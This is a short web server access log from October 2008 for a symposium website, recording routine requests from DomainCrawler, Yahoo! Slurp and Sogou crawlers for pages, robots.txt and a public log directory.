83.168.240.16 - - [16/Oct/2008:21:02:21 -0400] "GET / HTTP/1.0" 200 314 "http://www.domaincrawler.com/domains/view/geil-symposium.com" "DomainCrawler/1.0 (info@domaincrawler.com; http://www.domaincrawler.com/domains/view/geil-symposium.com)" 0 www.geil-symposium.com
83.168.240.16 - - [16/Oct/2008:21:02:21 -0400] "GET /logs HTTP/1.0" 301 331 "-" "DomainCrawler/1.0 (info@domaincrawler.com; http://www.domaincrawler.com/domains/view/geil-symposium.com)" 0 www.geil-symposium.com
83.168.240.16 - - [16/Oct/2008:21:02:22 -0400] "GET /logs/ HTTP/1.0" 200 373 "-" "DomainCrawler/1.0 (info@domaincrawler.com; http://www.domaincrawler.com/domains/view/geil-symposium.com)" 0 www.geil-symposium.com
74.6.22.99 - - [17/Oct/2008:00:21:14 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.99 - - [17/Oct/2008:00:21:14 -0400] "GET /logs/access.log HTTP/1.0" 200 198977 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.99 - - [17/Oct/2008:02:04:23 -0400] "GET /Sponsors.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
220.181.61.230 - - [17/Oct/2008:03:10:54 -0400] "GET / HTTP/1.1" 200 326 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 0 www.geil-symposium.com
220.181.61.230 - - [17/Oct/2008:03:11:04 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "-" 0 www.geil-symposium.com
